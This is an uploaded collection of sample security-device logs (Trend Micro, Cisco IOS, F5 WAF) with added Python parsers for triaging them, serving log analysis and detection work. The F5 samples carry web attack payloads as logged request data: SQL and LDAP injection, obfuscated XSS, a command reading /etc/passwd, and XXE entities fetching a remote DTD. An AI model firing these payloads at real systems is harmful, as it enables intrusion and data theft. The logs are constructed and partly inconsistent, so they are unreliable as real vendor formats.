Cybersecurity raw device sample logs

Uploaded by denver780980

RAW LOGS

A. Device type: Trend Micro Email Security


2024-05-25 14:30:00 [INFO] Mail Tracking Log:
- Message ID: <[email protected]>
- Sender: [email protected]
- Recipient: [email protected]
- Subject: Test Email
- Attachment: example.docx
- Threat Detection: Malware detected (Trojan.GenericKD.123456)
- Action: Blocked

2024-05-25 14:31:00 [INFO] Policy Event Log:
- Policy Name: Default Policy
- Event Type: Spam Detection
- Message ID: <[email protected]>
- Sender: [email protected]
- Recipient: [email protected]
- Subject: Spam Email
- Spam Score: 95
- Action: Tagged

2024-05-25 14:32:00 [INFO] URL Click Tracking Log:
- URL: http://example.com/malicious_url
- Message ID: <[email protected]>
- Sender: [email protected]
- Recipient: [email protected]
- Clicked: Yes
- Threat Detection: Malware detected (Ransomware.Generic.123456)
- Action: Blocked

2024-05-25 14:30:00 [INFO] Policy Event Log:
- Policy Name: Default Policy
- Event Type: Spam Detection
- Message ID: <[email protected]>
- Sender: [email protected]
- Recipient: [email protected]
- Subject: Spam Email
- Spam Score: 95
- Action: Tagged (Spam)

2024-05-25 14:30:00 [INFO] Policy Event Log:
- Policy Name: Default Policy
- Event Type: Spam Detection
- Message ID: <[email protected]>
- Sender: [email protected]
- Recipient: [email protected]
- Subject: Spam Email
- Scan Result: 10--5.534000-4.000000
- Action: Tagged (Spam)
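
The three record types above share one layout: a timestamped header line ending in a colon, followed by "- Key: Value" lines. The Python parser below is an added example (not Trend Micro code and not part of the original page). It assumes exactly the layout shown above, splits the text into records, pulls the detection name out of the parenthesised Threat Detection value, and applies three triage rules: any record with a named detection, any spam score at or above a threshold, and any URL click that was not blocked. The log text it runs on is constructed here from the samples above, with the redacted addresses replaced by made-up ones.

```python
import re
from dataclasses import dataclass, field

# Constructed sample text in the layout of the Mail Tracking / Policy Event /
# URL Click Tracking entries above. Addresses and message IDs are made up.
SAMPLE_LOG = """\
2024-05-25 14:30:00 [INFO] Mail Tracking Log:
- Message ID: <msg1@mail.example.com>
- Sender: sender@example.net
- Recipient: alice@example.com
- Subject: Test Email
- Attachment: example.docx
- Threat Detection: Malware detected (Trojan.GenericKD.123456)
- Action: Blocked

2024-05-25 14:31:00 [INFO] Policy Event Log:
- Policy Name: Default Policy
- Event Type: Spam Detection
- Message ID: <msg2@mail.example.com>
- Sender: promo@example.net
- Recipient: alice@example.com
- Subject: Spam Email
- Spam Score: 95
- Action: Tagged

2024-05-25 14:32:00 [INFO] URL Click Tracking Log:
- URL: http://example.com/malicious_url
- Message ID: <msg3@mail.example.com>
- Sender: sender@example.net
- Recipient: bob@example.com
- Clicked: Yes
- Threat Detection: Malware detected (Ransomware.Generic.123456)
- Action: Blocked
"""

HEADER_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) \[(?P<level>\w+)\] (?P<kind>.+?):$")
FIELD_RE = re.compile(r"^- (?P<key>[^:]+): ?(?P<value>.*)$")
DETECTION_RE = re.compile(r"\((?P<name>[^)]+)\)\s*$")


@dataclass
class MailEvent:
    timestamp: str
    level: str
    kind: str                      # "Mail Tracking Log", "Policy Event Log", ...
    fields: dict = field(default_factory=dict)

    @property
    def detection_name(self):
        """The parenthesised detection name, e.g. Trojan.GenericKD.123456, or None."""
        m = DETECTION_RE.search(self.fields.get("Threat Detection", ""))
        return m.group("name") if m else None


def parse_mail_log(text):
    """Split the multi-line log into MailEvent records."""
    events, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        h = HEADER_RE.match(line)
        if h:
            current = MailEvent(h["ts"], h["level"], h["kind"])
            events.append(current)
            continue
        f = FIELD_RE.match(line)
        if f and current is not None:
            current.fields[f["key"].strip()] = f["value"].strip()
        # Any other line is neither a header nor a field; a strict collector
        # would count it as a parse error rather than silently dropping it.
    return events


def triage(events, spam_threshold=90):
    """Return (event, reason) pairs worth an analyst's attention."""
    findings = []
    for ev in events:
        action = ev.fields.get("Action", "")
        score = ev.fields.get("Spam Score", "")
        if ev.detection_name:
            findings.append((ev, f"{action}: {ev.detection_name}"))
        elif score.isdigit() and int(score) >= spam_threshold:
            findings.append((ev, f"spam score {score} >= {spam_threshold}"))
        # The case not to miss: the user clicked and nothing stopped the request,
        # so the endpoint, not just the mailbox, needs follow-up.
        if (ev.kind == "URL Click Tracking Log"
                and ev.fields.get("Clicked") == "Yes" and action != "Blocked"):
            findings.append((ev, "URL clicked and not blocked"))
    return findings


if __name__ == "__main__":
    for ev, reason in triage(parse_mail_log(SAMPLE_LOG)):
        print(ev.timestamp, ev.kind, "->", reason)
```

The header regex is what separates records; every other line is either a field or noise, so a line that matches neither is the signal that the export format changed.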

B. Device type: Trend Micro Apex One


CEF:0|Trend Micro|Apex One|<Product version>|1000|File Created|5|suser=<username> dvc=<IP address> dst=<file path>

LEEF:1.0|Trend Micro|Apex One|<Product version>|1001|Threat Detected|10|suser=<username> dvc=<IP address> dst=<file path> threat=<threat name>

LEEF:1.0|Trend Micro|Apex One|1.0|1000|Attack Discovery Detection Event|4|vmid=1234567890,dname=DeviceName,dip=192.168.1.100,severity=4,policy=Default Policy,subject=Malware Detection,domainimpacted=example.com

LEEF:1.0|Trend Micro|Apex One|1.0|1001|Behavior Monitoring Event|5|vmid=1234567890,severity=5,policy=Default Policy,process=svchost.exe,object=C:\Windows\System32\svchost.exe,action=Blocked,tag1=Malware,reason=Behavioral Detection

LEEF:1.0|Trend Micro|Apex One|1.0|1002|C&C Callback Event|4|vmid=1234567890,sip=192.168.1.100,domainorigin=example.com,policy=Default Policy,action=Blocked,tag1=Malware,url=http://example.com/malware

LEEF:1.0|Trend Micro|Apex One|1.0|1003|Content Security Event|5|vmid=1234567890,[email protected],action=Blocked,tag1=Spam,subject=Spam Email,[email protected],url=http://example.com/spam

LEEF:1.0|Trend Micro|Apex One|1.0|1004|Data Loss Prevention Event|4|vmid=1234567890,severity=4,policy=Default Policy,sip=192.168.1.100,smac=00:11:22:33:44:55,sname=DeviceName,login=user,object=C:\Users\user\Documents\confidential.docx,action=Blocked,tag1=DLP,reason=Data Loss Prevention
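
Both layouts above are a pipe-delimited header followed by key=value extensions. CEF has seven header fields and a space-separated extension; LEEF has five header fields and, by default, tab-separated attributes, although the Apex One samples on this page add CEF-style Name and Severity fields after the event ID and separate the attributes with commas. The parser below is an added example, not Trend Micro's or any SIEM vendor's code. It splits the header on unescaped pipes, detects the extension delimiter, and splits pairs only at a delimiter that is followed by another key= token, so values containing spaces or commas ("Default Policy", a URL) survive. The optional delimiter header field of LEEF 2.0 is not handled. The sample lines are constructed from the entries above with the angle-bracket placeholders filled in with made-up values.

```python
import re

# Constructed lines following the Apex One CEF/LEEF entries above; the
# <Product version>/<username> placeholders are filled with made-up values.
SAMPLE_LINES = [
    "CEF:0|Trend Micro|Apex One|14.0|1000|File Created|5|"
    "suser=jdoe dvc=192.168.1.50 dst=C:\\Users\\jdoe\\Downloads\\invoice.exe",
    "LEEF:1.0|Trend Micro|Apex One|14.0|1001|Threat Detected|10|"
    "suser=jdoe\tdvc=192.168.1.50\tdst=C:\\Users\\jdoe\\Downloads\\invoice.exe"
    "\tthreat=Trojan.GenericKD.123456",
    "LEEF:1.0|Trend Micro|Apex One|1.0|1001|Behavior Monitoring Event|5|"
    "vmid=1234567890,severity=5,policy=Default Policy,process=svchost.exe,"
    "object=C:\\Windows\\System32\\svchost.exe,action=Blocked,tag1=Malware,"
    "reason=Behavioral Detection",
    "LEEF:1.0|Trend Micro|Apex One|1.0|1002|C&C Callback Event|4|"
    "vmid=1234567890,sip=192.168.1.100,domainorigin=example.com,"
    "policy=Default Policy,action=Blocked,tag1=Malware,url=http://example.com/malware",
]

HEADER_SPLIT = re.compile(r"(?<!\\)\|")       # a pipe not preceded by a backslash


def _unescape_header(s):
    return s.replace("\\|", "|").replace("\\\\", "\\")


def split_extension(ext, delimiter):
    """Split key=value pairs. Values may contain the delimiter (spaces in
    'Default Policy', commas in a URL), so split only where the delimiter is
    immediately followed by another key= token. A value that itself contains
    ',word=' would still be cut; the producer has to escape such values."""
    if delimiter == "\t":
        pairs = ext.split("\t")
    else:
        pairs = re.split(re.escape(delimiter) + r"(?=\w+=)", ext)
    out = {}
    for p in pairs:
        if "=" in p:
            k, v = p.split("=", 1)
            out[k.strip()] = v.replace("\\=", "=").replace("\\\\", "\\")
    return out


def parse_event(line):
    parts = HEADER_SPLIT.split(line.rstrip("\r\n"))
    fmt, _, version = parts[0].partition(":")
    name = severity = ""
    if fmt == "CEF":
        if len(parts) < 8:
            raise ValueError("CEF needs 7 header fields plus an extension")
        vendor, product, dev_version, sig_id, name, severity = map(_unescape_header, parts[1:7])
        ext = split_extension("|".join(parts[7:]), " ")
    elif fmt == "LEEF":
        if len(parts) < 6:
            raise ValueError("LEEF needs 5 header fields plus attributes")
        vendor, product, dev_version, sig_id = map(_unescape_header, parts[1:5])
        rest = parts[5:]
        # Standard LEEF goes straight from EventID to attributes; the Apex One
        # samples above insert CEF-style Name and Severity fields first.
        while rest and "=" not in rest[0]:
            extra = rest.pop(0)
            if not name:
                name = extra
            elif not severity:
                severity = extra
        ext_text = "|".join(rest)
        if "\t" in ext_text:
            delimiter = "\t"
        elif re.search(r",\w+=", ext_text):
            delimiter = ","
        else:
            delimiter = " "
        ext = split_extension(ext_text, delimiter)
    else:
        raise ValueError(f"unknown event format {fmt!r}")
    return {"format": fmt, "version": version, "vendor": vendor, "product": product,
            "device_version": dev_version, "signature_id": sig_id, "name": name,
            "severity": severity, "ext": ext}


def blocked_threats(lines):
    """Events where the agent blocked something: (signature_id, name, indicator)."""
    hits = []
    for ev in map(parse_event, lines):
        ext = ev["ext"]
        if ext.get("action") == "Blocked" or ext.get("threat"):
            indicator = ext.get("url") or ext.get("object") or ext.get("dst") or ""
            hits.append((ev["signature_id"], ev["name"], indicator))
    return hits
```

The delimiter detection is a heuristic for mixed feeds; when a single product is onboarded, pin the delimiter instead of guessing it per line.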

C. Device type: Cisco Router

<time_stamp> <source_IP_address> <destination_IP_address> <protocol> <information>

12:01:02 192.168.1.1 8.8.8.8 TCP Established

[critical-attack]" => "(?i)(?<=\s)%(SYSMGR|SECURITY)-(?<severity>[0-9]+)-(?<signature>[A-Z0-9_]+

May 25 2024 12:01:02: %SYS-5-LOG_ALERT: DDoS attack detected from 192.168.1.100 to 192.168.2.100 on interface GigabitEthernet0/1

May 25 2024 12:01:03: %SYS-5-LOG_ALERT: DDoS attack detected from 192.168.1.101 to 192.168.2.100 on interface GigabitEthernet0/1
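
Cisco IOS system messages carry facility, severity and mnemonic in the %FACILITY-SEVERITY-MNEMONIC token, which is what the pattern fragment above keys on with its severity and signature groups. The parser below is an added example, not Cisco or Logstash code. It extracts that token with a regex, maps the numeric severity to the IOS level name (so that the DDoS messages above, logged at level 5, are recognised as notifications rather than alerts), pulls source and destination addresses out of the message text, and groups sources per destination, which is the difference between one noisy host and a distributed flood. The sample lines are constructed: the first two mirror the entries above, the others are made-up ACL-log and link-state messages in the same layout.

```python
import re
from collections import defaultdict

# Constructed sample lines: the first two mirror the entries above, the rest are
# made-up ACL-log and link-state messages in the same IOS layout.
SAMPLE_LINES = [
    "May 25 2024 12:01:02: %SYS-5-LOG_ALERT: DDoS attack detected from 192.168.1.100 to 192.168.2.100 on interface GigabitEthernet0/1",
    "May 25 2024 12:01:03: %SYS-5-LOG_ALERT: DDoS attack detected from 192.168.1.101 to 192.168.2.100 on interface GigabitEthernet0/1",
    "May 25 2024 12:01:04: %SEC-6-IPACCESSLOGP: list 101 denied tcp 10.0.0.5(4444) -> 192.168.2.100(22), 1 packet",
    "May 25 2024 12:01:05: %LINK-3-UPDOWN: Interface GigabitEthernet0/2, changed state to down",
]

# IOS severity levels 0-7.
SEVERITY_NAMES = ["emergencies", "alerts", "critical", "errors",
                  "warnings", "notifications", "informational", "debugging"]

# The timestamp is matched non-greedily so optional sequence numbers, a leading
# '*' and millisecond suffixes in front of ': %' do not break the match.
MSG_RE = re.compile(
    r"^(?P<ts>.*?): %(?P<facility>[A-Z0-9_]+)-(?P<severity>[0-7])-(?P<mnemonic>[A-Z0-9_]+): (?P<message>.*)$")
IP = r"\d{1,3}(?:\.\d{1,3}){3}"
FROM_TO_RE = re.compile(rf"\bfrom (?P<src>{IP}) to (?P<dst>{IP})\b")
ACL_RE = re.compile(rf"\b(?P<src>{IP})\(\d+\) -> (?P<dst>{IP})\(\d+\)")


def parse_ios_message(line):
    """Dict with ts, facility, severity (int), severity_name, mnemonic, message,
    src, dst; None when the line is not an IOS system message."""
    m = MSG_RE.match(line)
    if not m:
        return None
    ev = m.groupdict()
    ev["severity"] = int(ev["severity"])
    ev["severity_name"] = SEVERITY_NAMES[ev["severity"]]
    addr = FROM_TO_RE.search(ev["message"]) or ACL_RE.search(ev["message"])
    ev["src"], ev["dst"] = (addr["src"], addr["dst"]) if addr else (None, None)
    return ev


def sources_per_destination(events, mnemonic="LOG_ALERT"):
    """Distinct source addresses seen per destination for one mnemonic."""
    seen = defaultdict(set)
    for ev in events:
        if ev and ev["mnemonic"] == mnemonic and ev["src"]:
            seen[ev["dst"]].add(ev["src"])
    return dict(seen)


def distributed_targets(events, min_sources=2):
    """Destinations reported from at least min_sources distinct sources."""
    return sorted(dst for dst, srcs in sources_per_destination(events).items()
                  if len(srcs) >= min_sources)
```

Filter on the numeric severity and the mnemonic, not on words in the free-text message: the message text is what changes between IOS releases.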
D. Device type: F5 WAF

2024-05-25 14:30:00,123 INFO [WAF] [General] [policy_name] [attack_type] [sig_ids] [sig_names] [violations] [sub_violations] [request] [response_code] [ip_client] [dest_ip] [dest_port] [method] [uri] [query_string] [headers] [geo_location] [ip_address_intelligence] [management_ip_address] [route_domain] [session_id] [support_id] [unit_hostname] [username] [x_forwarded_for_header_value]

SQL Injection attack:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [SQL Injection] [2000031] [SQL Injection - UNION] [Illegal User Input] [SQL Injection - UNION] [GET /index.php?username=' OR 1=1 --] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [username=' OR 1=1 --] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

Cross-Site Scripting in WAF:

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Cross-Site Scripting] [2000041] [Cross-Site Scripting - HTML] [Illegal User Input] [Cross-Site Scripting - HTML] [GET /index.html?<script>alert(1)</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html] [<script>alert(1)</script>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

HTTP GET Flood:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [HTTP GET Flood] [2000001] [HTTP GET Flood] [Illegal User Input] [HTTP GET Flood] [GET / HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/] [HTTP/1.1] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [HTTP GET Flood] [2000001] [HTTP GET Flood] [Illegal User Input] [HTTP GET Flood] [GET /index.php HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/] [HTTP/1.1] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [HTTP GET Flood] [2000001] [HTTP GET Flood] [Illegal User Input] [HTTP GET Flood] [GET /index.php?id=1 HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/] [HTTP/1.1] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

Cross-Site Scripting:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [Cross-Site Scripting] [2000041] [Cross-Site Scripting - HTML] [Illegal User Input] [Cross-Site Scripting - HTML] [GET /index.html?<script>alert(1)</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html] [<script>alert(1)</script>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Cross-Site Scripting] [2000042] [Cross-Site Scripting - JavaScript] [Illegal User Input] [Cross-Site Scripting - JavaScript] [GET /index.php?username=<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%27%29%3b'));</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [username=<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%73%63%72%69%70%74%3e%61%6c%65%72%74%28%31%29%3c%2f%73%63%72%69%70%74%3e%27%29%3b'));</script>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [Cross-Site Scripting] [2000043] [Cross-Site Scripting - DOM-Based] [Illegal User Input] [Cross-Site Scripting - DOM-Based] [GET /index.html?<svg/onload=alert(1)>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html] [<svg/onload=alert(1)>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:03,012 INFO [WAF] [General] [my_policy] [Cross-Site Scripting] [2000044] [Cross-Site Scripting - Stored] [Illegal User Input] [Cross-Site Scripting - Stored] [GET /index.php?comment=<script>document.write('<img src=http://example.com/evil.jpg>');</script>] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [comment=<script>document.write('<img src=http://example.com/evil.jpg>');</script>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

Session Hijacking:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [Session Hijacking] [2000051] [Session Hijacking - Cookie Theft] [Illegal User Input] [Session Hijacking - Cookie Theft] [GET /index.html HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.html] [Cookie: session_id=1234567890abcdef] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Session Hijacking] [2000052] [Session Hijacking - Session Fixation] [Illegal User Input] [Session Hijacking - Session Fixation] [GET /index.php?PHPSESSID=1234567890abcdef HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [PHPSESSID=1234567890abcdef] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [Session Hijacking] [2000053] [Session Hijacking - Session Prediction] [Illegal User Input] [Session Hijacking - Session Prediction] [GET /index.jsp;jsessionid=1234567890abcdef HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.jsp] [jsessionid=1234567890abcdef] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

Command Injection in WAF:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [Command Injection] [2000061] [Command Injection - System Command] [Illegal User Input] [Command Injection - System Command] [GET /index.php?cmd=cat+/etc/passwd HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [cmd=cat+/etc/passwd] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [Command Injection] [2000062] [Command Injection - SQL Injection] [Illegal User Input] [Command Injection - SQL Injection] [GET /index.php?id=1+OR+1=1 HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [id=1+OR+1=1] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [Command Injection] [2000063] [Command Injection - LDAP Injection] [Illegal User Input] [Command Injection - LDAP Injection] [GET /index.php?username=*)(|(password=*)) HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [GET] [/index.php] [username=*)(|(password=*))] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

XML External Entity (XXE) in WAF:

2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [XXE] [2000071] [XXE - Blind XXE] [Illegal User Input] [XXE - Blind XXE] [POST /check.php HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [POST] [/check.php] [XML: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [ <!ENTITY xxe SYSTEM 'http://example.com/xxe.dtd'> ]><comment><text>&xxe;</text></comment>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:01,456 INFO [WAF] [General] [my_policy] [XXE] [2000072] [XXE - XXE with External DTD] [Illegal User Input] [XXE - XXE with External DTD] [POST /check.php HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [POST] [/check.php] [XML: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://example.com/xxe.dtd"> %remote; ]><comment><text>&test;</text></comment>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]

2024-05-25 14:30:02,789 INFO [WAF] [General] [my_policy] [XXE] [2000073] [XXE - XXE with Internal DTD] [Illegal User Input] [XXE - XXE with Internal DTD] [POST /check.php HTTP/1.1] [403] [192.168.1.100] [10.10.10.10] [80] [POST] [/check.php] [XML: <?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://example.com/xxe.dtd"> %remote; ]><comment><text>&test;</text></comment>] [User-Agent: Mozilla/5.0, Accept: */*, Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] [192.168.1.100]
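
The template line at the top of this section defines the bracketed layout the entries above use: timestamp, level, the [WAF] [General] tags, then one bracketed value per template field in order. The parser below is an added example, not F5 code, and the bracketed layout is this page's own rather than the BIG-IP ASM remote-logging format shown later in the section. It maps bracketed values onto the template by position and is deliberately strict, because the layout has no escape character: a request payload containing a ']' closes a field early and shifts everything after it, so a stray character between fields or a field-count mismatch is treated as a parse failure rather than guessed around. Nested '[' ... ']' inside a value (the DOCTYPE in the XXE entries) is tracked by depth and survives. Note that the sample entries on this page carry 22 values against the 24-field template (session_id and support_id are absent), so the template used for them omits those two fields. The sample line is constructed from the SQL injection entry above.

```python
import re

# Field order from the template line at the top of this section.
TEMPLATE_FULL = (
    "policy_name attack_type sig_ids sig_names violations sub_violations request "
    "response_code ip_client dest_ip dest_port method uri query_string headers "
    "geo_location ip_address_intelligence management_ip_address route_domain "
    "session_id support_id unit_hostname username x_forwarded_for_header_value").split()
# The sample entries on this page omit session_id and support_id.
TEMPLATE_SAMPLE = [f for f in TEMPLATE_FULL if f not in ("session_id", "support_id")]

# Constructed sample: the SQL injection entry above, on one line.
SAMPLE_SQLI = (
    "2024-05-25 14:30:00,123 INFO [WAF] [General] [my_policy] [SQL Injection] [2000031] "
    "[SQL Injection - UNION] [Illegal User Input] [SQL Injection - UNION] "
    "[GET /index.php?username=' OR 1=1 --] [403] [192.168.1.100] [10.10.10.10] [80] [GET] "
    "[/index.php] [username=' OR 1=1 --] [User-Agent: Mozilla/5.0, Accept: */*, "
    "Accept-Language: en-US] [US] [Malicious] [10.10.10.1] [0] [my_bigip] [anonymous] "
    "[192.168.1.100]")
# The same entry with a ']' inside the query string: the layout cannot carry it.
SAMPLE_INJECTED = SAMPLE_SQLI.replace("[username=' OR 1=1 --]", "[username=x]y]")

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2},\d{3}) (?P<level>\w+) \[WAF\] \[General\] (?P<rest>.*)$")


def split_brackets(s):
    """Return the bracketed values in order. Nesting depth is tracked so a
    '[ ... ]' inside a value stays inside it; anything other than whitespace
    between fields means a ']' in a payload closed a field early."""
    fields, buf, depth = [], [], 0
    for ch in s:
        if depth == 0:
            if ch == "[":
                depth = 1
            elif not ch.isspace():
                raise ValueError(f"stray text outside brackets: {ch!r}")
            continue
        if ch == "[":
            depth += 1
        elif ch == "]":
            depth -= 1
            if depth == 0:
                fields.append("".join(buf))
                buf = []
                continue
        buf.append(ch)
    if depth != 0:
        raise ValueError("unterminated bracket")
    return fields


def parse_waf_line(line, template=TEMPLATE_SAMPLE):
    m = LINE_RE.match(line)
    if not m:
        raise ValueError("not a [WAF] [General] line")
    values = split_brackets(m["rest"])
    if len(values) != len(template):
        raise ValueError(f"expected {len(template)} bracketed fields, got {len(values)}")
    ev = dict(zip(template, values))
    ev["timestamp"], ev["level"] = m["ts"], m["level"]
    return ev


def safe_parse(line, template=TEMPLATE_SAMPLE):
    """None instead of an exception, for batch processing where a bad line is
    counted and quarantined rather than allowed to abort the run."""
    try:
        return parse_waf_line(line, template)
    except ValueError:
        return None


def is_blocked(ev):
    return ev["response_code"] == "403"
```

Quarantined lines deserve a look of their own: a parser failure on a WAF log is as likely to be an attacker probing the logging pipeline as a format change.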
Remote code execution attack in WAF:

<24>May 25 2024 12:00:00 f5-bigip: [ip_address] 12345 [host] "GET /path/to/vulnerable/script HTTP/1.1" - 400 267 "-" "Mozilla/5.0 (compatible; F5 BIG-IP)" 0 0 "https://www.example.com/legal?page=terms" "example.com"

Phishing attack in WAF:

2022-07-25 14:30:10 UTC,172.16.1.100,80,POST,/login.php,HTTP/1.1,403,12346,Phishing,Score:95,Signature:PHISHING_CREDENTIAL_THEFT,Client IP:192.168.1.101,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:403 Forbidden

Watering hole attack in WAF:

2022-07-25 14:30:05 UTC,172.16.1.100,80,GET,/js/jquery.min.js,HTTP/1.1,403,12345,WATERING HOLE,Score:90,Signature:WATERING_HOLE_JS_INJECTION,Client IP:192.168.1.100,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:403 Forbidden,Referer:http://example.com/news

2022-07-25 14:30:10 UTC,172.16.1.100,80,GET,/css/bootstrap.min.css,HTTP/1.1,403,12346,WATERING HOLE,Score:85,Signature:WATERING_HOLE_CSS_INJECTION,Client IP:192.168.1.101,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:403 Forbidden,Referer:http://example.com/blog

2022-07-25 14:30:15 UTC,172.16.1.100,80,GET,/images/logo.png,HTTP/1.1,404,12347,WATERING HOLE,Score:95,Signature:WATERING_HOLE_IMAGE_INJECTION,Client IP:192.168.1.102,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:404 Not Found,Referer:http://example.com/about

Spear phishing in WAF:

2022-07-25 14:30:10 UTC,172.16.1.100,80,POST,/hr/benefits.php,HTTP/1.1,403,12346,SPEAR Phishing,Score:90,Signature:SPEAR_PHISHING_HR,Client IP:192.168.1.101,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:403 Forbidden,Targeted User:[email protected]

2022-07-25 14:30:15 UTC,172.16.1.100,80,GET,/secure/login.aspx,HTTP/1.1,404,12347,Phishing,Score:85,Signature:PHISHING_FAKE_LOGIN_PAGE,Client IP:192.168.1.102,User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3,Response Code:404 Not Found

Bot attack in WAF:

